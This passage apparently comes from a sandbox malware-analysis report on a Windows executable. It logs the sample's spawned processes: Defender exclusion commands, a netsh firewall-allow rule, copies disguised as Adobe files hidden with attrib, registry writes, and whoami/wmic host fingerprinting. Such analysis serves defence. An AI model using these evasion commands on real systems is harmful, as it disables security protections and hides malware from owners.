Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig //flushdns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Windows\acrotray.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Trion Softworks" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C ver
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\acrotray.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564779831.0000000002370000.00000002.00020000.sdmp, acrotray.exe, 00000029.00000002.563842494.0000000002530000.00000002.00020000.sdmp, acrotray.exe, 00000045.00000002.563833834.00000000026E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
